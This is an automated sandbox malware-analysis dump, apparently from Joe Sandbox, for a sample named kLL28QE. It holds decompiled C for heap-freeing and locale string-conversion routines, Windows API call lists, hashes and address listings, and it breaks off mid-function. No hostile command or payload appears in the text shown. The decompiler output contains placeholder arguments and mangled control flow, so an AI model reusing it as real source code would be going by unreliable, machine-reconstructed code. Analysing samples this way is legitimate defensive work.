                                                                                                                                                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E0040ADB0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				void* _t5;
                                                                                                                                                                                                      				intOrPtr* _t11;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				_t5 =  *(__ecx + 8);
                                                                                                                                                                                                      				 *__ecx = 0x41eff0;
                                                                                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                                                                                      					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *(_t11 + 0xc) != 0) {
                                                                                                                                                                                                      					_t5 = GetProcessHeap();
                                                                                                                                                                                                      					if(_t5 != 0) {
                                                                                                                                                                                                      						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t5;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F47000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2f47000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction ID: 681098410f28b3434b440a8960992e133ddb4d76d2a74d1f4d64a87a098f405f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0118272340100AFD744DF59DC80EA6B7EAEB89364B298096EE04CB321DBB5ED42C760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                      				int _v16;
                                                                                                                                                                                                      				int _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      				intOrPtr _t112;
                                                                                                                                                                                                      				intOrPtr _t113;
                                                                                                                                                                                                      				short* _t115;
                                                                                                                                                                                                      				short* _t116;
                                                                                                                                                                                                      				char* _t120;
                                                                                                                                                                                                      				short* _t121;
                                                                                                                                                                                                      				short* _t123;
                                                                                                                                                                                                      				short* _t127;
                                                                                                                                                                                                      				int _t128;
                                                                                                                                                                                                      				short* _t141;
                                                                                                                                                                                                      				signed int _t144;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				short* _t147;
                                                                                                                                                                                                      				signed int _t150;
                                                                                                                                                                                                      				short* _t153;
                                                                                                                                                                                                      				char* _t157;
                                                                                                                                                                                                      				int _t160;
                                                                                                                                                                                                      				long _t162;
                                                                                                                                                                                                      				signed int _t174;
                                                                                                                                                                                                      				signed int _t178;
                                                                                                                                                                                                      				signed int _t179;
                                                                                                                                                                                                      				int _t182;
                                                                                                                                                                                                      				short* _t184;
                                                                                                                                                                                                      				signed int _t186;
                                                                                                                                                                                                      				signed int _t188;
                                                                                                                                                                                                      				short* _t189;
                                                                                                                                                                                                      				int _t191;
                                                                                                                                                                                                      				intOrPtr _t194;
                                                                                                                                                                                                      				int _t207;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t110 =  *0x422234; // 0x6dd51581
                                                                                                                                                                                                      				_v8 = _t110 ^ _t188;
                                                                                                                                                                                                      				_t184 = __ecx;
                                                                                                                                                                                                      				_t194 =  *0x423e7c; // 0x1
                                                                                                                                                                                                      				if(_t194 == 0) {
                                                                                                                                                                                                      					_t182 = 1;
                                                                                                                                                                                                      					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                                                                                                                      						_t162 = GetLastError();
                                                                                                                                                                                                      						__eflags = _t162 - 0x78;
                                                                                                                                                                                                      						if(_t162 == 0x78) {
                                                                                                                                                                                                      							 *0x423e7c = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						 *0x423e7c = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a16 <= 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					_t112 =  *0x423e7c; // 0x1
                                                                                                                                                                                                      					if(_t112 == 2 || _t112 == 0) {
                                                                                                                                                                                                      						_v16 = 0;
                                                                                                                                                                                                      						_v20 = 0;
                                                                                                                                                                                                      						__eflags = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _a28;
                                                                                                                                                                                                      						if(_a28 == 0) {
                                                                                                                                                                                                      							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                                                                                                                                                      						_v24 = _t113;
                                                                                                                                                                                                      						__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                      						if(_t113 != 0xffffffff) {
                                                                                                                                                                                                      							__eflags = _t113 - _a28;
                                                                                                                                                                                                      							if(_t113 == _a28) {
                                                                                                                                                                                                      								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                      								L78:
                                                                                                                                                                                                      								__eflags = _v16;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									_push(_v16);
                                                                                                                                                                                                      									E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t115 = _v20;
                                                                                                                                                                                                      								__eflags = _t115;
                                                                                                                                                                                                      								if(_t115 != 0) {
                                                                                                                                                                                                      									__eflags = _a20 - _t115;
                                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                                      										_push(_t115);
                                                                                                                                                                                                      										E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t116 = _t184;
                                                                                                                                                                                                      								goto L84;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                                                                                                      							_t191 =  &(_t189[0xc]);
                                                                                                                                                                                                      							_v16 = _t120;
                                                                                                                                                                                                      							__eflags = _t120;
                                                                                                                                                                                                      							if(_t120 == 0) {
                                                                                                                                                                                                      								goto L58;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                                                                                                      							_v12 = _t121;
                                                                                                                                                                                                      							__eflags = _t121;
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									L71:
                                                                                                                                                                                                      									_t182 = 0;
                                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                                      									L72:
                                                                                                                                                                                                      									__eflags = _t182;
                                                                                                                                                                                                      									if(_t182 == 0) {
                                                                                                                                                                                                      										goto L62;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									E0040BA30(_t182, _t182, 0, _v12);
                                                                                                                                                                                                      									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                                                                                                      									_v12 = _t123;
                                                                                                                                                                                                      									__eflags = _t123;
                                                                                                                                                                                                      									if(_t123 != 0) {
                                                                                                                                                                                                      										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                                                                                                      										_v20 = _t186;
                                                                                                                                                                                                      										asm("sbb esi, esi");
                                                                                                                                                                                                      										_t184 =  ~_t186 & _v12;
                                                                                                                                                                                                      										__eflags = _t184;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t184 = 0;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									E004147AE(_t182);
                                                                                                                                                                                                      									goto L78;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = _t121 - 0xffffffe0;
                                                                                                                                                                                                      								if(_t121 > 0xffffffe0) {
                                                                                                                                                                                                      									goto L71;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t127 =  &(_t121[4]);
                                                                                                                                                                                                      								__eflags = _t127 - 0x400;
                                                                                                                                                                                                      								if(_t127 > 0x400) {
                                                                                                                                                                                                      									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                                                                                                                                                      									__eflags = _t128;
                                                                                                                                                                                                      									if(_t128 != 0) {
                                                                                                                                                                                                      										 *_t128 = 0xdddd;
                                                                                                                                                                                                      										_t128 = _t128 + 8;
                                                                                                                                                                                                      										__eflags = _t128;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t182 = _t128;
                                                                                                                                                                                                      									goto L72;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E0040CFB0(_t127);
                                                                                                                                                                                                      								_t182 = _t191;
                                                                                                                                                                                                      								__eflags = _t182;
                                                                                                                                                                                                      								if(_t182 == 0) {
                                                                                                                                                                                                      									goto L62;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								 *_t182 = 0xcccc;
                                                                                                                                                                                                      								_t182 = _t182 + 8;
                                                                                                                                                                                                      								goto L72;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L62:
                                                                                                                                                                                                      							_t184 = 0;
                                                                                                                                                                                                      							goto L78;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L58;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t112 != 1) {
                                                                                                                                                                                                      							L58:
                                                                                                                                                                                                      							_t116 = 0;
                                                                                                                                                                                                      							L84:
                                                                                                                                                                                                      							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v12 = 0;
                                                                                                                                                                                                      						if(_a28 == 0) {
                                                                                                                                                                                                      							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t184 = MultiByteToWideChar;
                                                                                                                                                                                                      						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                      						_t207 = _t182;
                                                                                                                                                                                                      						if(_t207 == 0) {
                                                                                                                                                                                                      							goto L58;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(_t207 <= 0) {
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								_v16 = 0;
                                                                                                                                                                                                      								L29:
                                                                                                                                                                                                      								if(_v16 == 0) {
                                                                                                                                                                                                      									goto L58;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                                                                                                      									L52:
                                                                                                                                                                                                      									E004147AE(_v16);
                                                                                                                                                                                                      									_t116 = _v12;
                                                                                                                                                                                                      									goto L84;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t184 = LCMapStringW;
                                                                                                                                                                                                      								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                                                                                                      								_v12 = _t174;
                                                                                                                                                                                                      								if(_t174 == 0) {
                                                                                                                                                                                                      									goto L52;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if((_a8 & 0x00000400) == 0) {
                                                                                                                                                                                                      									__eflags = _t174;
                                                                                                                                                                                                      									if(_t174 <= 0) {
                                                                                                                                                                                                      										L44:
                                                                                                                                                                                                      										_t184 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										L45:
                                                                                                                                                                                                      										__eflags = _t184;
                                                                                                                                                                                                      										if(_t184 != 0) {
                                                                                                                                                                                                      											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                                                                                                      											__eflags = _t141;
                                                                                                                                                                                                      											if(_t141 != 0) {
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												__eflags = _a24;
                                                                                                                                                                                                      												if(_a24 != 0) {
                                                                                                                                                                                                      													_push(_a24);
                                                                                                                                                                                                      													_push(_a20);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      													_push(0);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											E004147AE(_t184);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L52;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t144 = 0xffffffe0;
                                                                                                                                                                                                      									_t179 = _t144 % _t174;
                                                                                                                                                                                                      									__eflags = _t144 / _t174 - 2;
                                                                                                                                                                                                      									if(_t144 / _t174 < 2) {
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t52 = _t174 + 8; // 0x8
                                                                                                                                                                                                      									_t146 = _t174 + _t52;
                                                                                                                                                                                                      									__eflags = _t146 - 0x400;
                                                                                                                                                                                                      									if(_t146 > 0x400) {
                                                                                                                                                                                                      										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                                                                                                                                                      										__eflags = _t147;
                                                                                                                                                                                                      										if(_t147 != 0) {
                                                                                                                                                                                                      											 *_t147 = 0xdddd;
                                                                                                                                                                                                      											_t147 =  &(_t147[4]);
                                                                                                                                                                                                      											__eflags = _t147;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t184 = _t147;
                                                                                                                                                                                                      										goto L45;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									E0040CFB0(_t146);
                                                                                                                                                                                                      									_t184 = _t189;
                                                                                                                                                                                                      									__eflags = _t184;
                                                                                                                                                                                                      									if(_t184 == 0) {
                                                                                                                                                                                                      										goto L52;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *_t184 = 0xcccc;
                                                                                                                                                                                                      									_t184 =  &(_t184[4]);
                                                                                                                                                                                                      									goto L45;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                                                                                                      									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t150 = 0xffffffe0;
                                                                                                                                                                                                      							_t179 = _t150 % _t182;
                                                                                                                                                                                                      							if(_t150 / _t182 < 2) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t25 = _t182 + 8; // 0x8
                                                                                                                                                                                                      							_t152 = _t182 + _t25;
                                                                                                                                                                                                      							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                                      								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                                      								__eflags = _t153;
                                                                                                                                                                                                      								if(_t153 == 0) {
                                                                                                                                                                                                      									L27:
                                                                                                                                                                                                      									_v16 = _t153;
                                                                                                                                                                                                      									goto L29;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								 *_t153 = 0xdddd;
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								_t153 =  &(_t153[4]);
                                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							E0040CFB0(_t152);
                                                                                                                                                                                                      							_t153 = _t189;
                                                                                                                                                                                                      							if(_t153 == 0) {
                                                                                                                                                                                                      								goto L27;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *_t153 = 0xcccc;
                                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}











































                                                                                                                                                                                                      0x004172b5
                                                                                                                                                                                                      0x004171c7
                                                                                                                                                                                                      0x004171db
                                                                                                                                                                                                      0x004171dd
                                                                                                                                                                                                      0x004171e2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004171ef
                                                                                                                                                                                                      0x0041721a
                                                                                                                                                                                                      0x0041721c
                                                                                                                                                                                                      0x00417263
                                                                                                                                                                                                      0x00417263
                                                                                                                                                                                                      0x00417263
                                                                                                                                                                                                      0x00417265
                                                                                                                                                                                                      0x00417265
                                                                                                                                                                                                      0x00417267
                                                                                                                                                                                                      0x00417277
                                                                                                                                                                                                      0x0041727d
                                                                                                                                                                                                      0x0041727f
                                                                                                                                                                                                      0x00417281
                                                                                                                                                                                                      0x00417282
                                                                                                                                                                                                      0x00417283
                                                                                                                                                                                                      0x00417286
                                                                                                                                                                                                      0x0041728c
                                                                                                                                                                                                      0x0041728f
                                                                                                                                                                                                      0x00417288
                                                                                                                                                                                                      0x00417288
                                                                                                                                                                                                      0x00417289
                                                                                                                                                                                                      0x00417289
                                                                                                                                                                                                      0x004172a0
                                                                                                                                                                                                      0x004172a0
                                                                                                                                                                                                      0x004172a4
                                                                                                                                                                                                      0x004172a9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417267
                                                                                                                                                                                                      0x00417222
                                                                                                                                                                                                      0x00417223
                                                                                                                                                                                                      0x00417225
                                                                                                                                                                                                      0x00417228
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041722a
                                                                                                                                                                                                      0x0041722a
                                                                                                                                                                                                      0x0041722e
                                                                                                                                                                                                      0x00417233
                                                                                                                                                                                                      0x0041724c
                                                                                                                                                                                                      0x00417252
                                                                                                                                                                                                      0x00417254
                                                                                                                                                                                                      0x00417256
                                                                                                                                                                                                      0x0041725c
                                                                                                                                                                                                      0x0041725c
                                                                                                                                                                                                      0x0041725c
                                                                                                                                                                                                      0x0041725f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041725f
                                                                                                                                                                                                      0x00417235
                                                                                                                                                                                                      0x0041723a
                                                                                                                                                                                                      0x0041723c
                                                                                                                                                                                                      0x0041723e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417240
                                                                                                                                                                                                      0x00417246
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417246
                                                                                                                                                                                                      0x004171f4
                                                                                                                                                                                                      0x00417213
                                                                                                                                                                                                      0x00417213
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004171f4
                                                                                                                                                                                                      0x00417163
                                                                                                                                                                                                      0x00417164
                                                                                                                                                                                                      0x00417169
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041716b
                                                                                                                                                                                                      0x0041716b
                                                                                                                                                                                                      0x00417174
                                                                                                                                                                                                      0x0041718a
                                                                                                                                                                                                      0x00417190
                                                                                                                                                                                                      0x00417192
                                                                                                                                                                                                      0x0041719d
                                                                                                                                                                                                      0x0041719d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041719d
                                                                                                                                                                                                      0x00417194
                                                                                                                                                                                                      0x0041719a
                                                                                                                                                                                                      0x0041719a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041719a
                                                                                                                                                                                                      0x00417176
                                                                                                                                                                                                      0x0041717b
                                                                                                                                                                                                      0x0041717f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417181
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00417181
                                                                                                                                                                                                      0x00417157
                                                                                                                                                                                                      0x00417109
                                                                                                                                                                                                      0x004170df
                                                                                                                                                                                                      0x004170e2
                                                                                                                                                                                                      0x004170e5
                                                                                                                                                                                                      0x004170e5
                                                                                                                                                                                                      0x004170e8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004170ea
                                                                                                                                                                                                      0x004170ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004170ef
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x004170ef
                                                                                                                                                                                                      0x004170f7
                                                                                                                                                                                                      0x004170fb
                                                                                                                                                                                                      0x004170fd
                                                                                                                                                                                                      0x004170fd
                                                                                                                                                                                                      0x004170fe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,049B18C0), ref: 004170C5
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                      • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                      • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3809854901-0
                                                                                                                                                                                                      • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				intOrPtr* _t57;
                                                                                                                                                                                                      				char* _t60;
                                                                                                                                                                                                      				char _t62;
                                                                                                                                                                                                      				intOrPtr _t63;
                                                                                                                                                                                                      				char _t64;
                                                                                                                                                                                                      				intOrPtr _t65;
                                                                                                                                                                                                      				intOrPtr _t66;
                                                                                                                                                                                                      				intOrPtr _t67;
                                                                                                                                                                                                      				intOrPtr _t69;
                                                                                                                                                                                                      				intOrPtr _t70;
                                                                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                                                                      				intOrPtr* _t83;
                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                      				char* _t88;
                                                                                                                                                                                                      				char* _t89;
                                                                                                                                                                                                      				intOrPtr* _t91;
                                                                                                                                                                                                      				intOrPtr* _t93;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				signed int _t98;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				void* _t101;
                                                                                                                                                                                                      				void* _t102;
                                                                                                                                                                                                      				void* _t103;
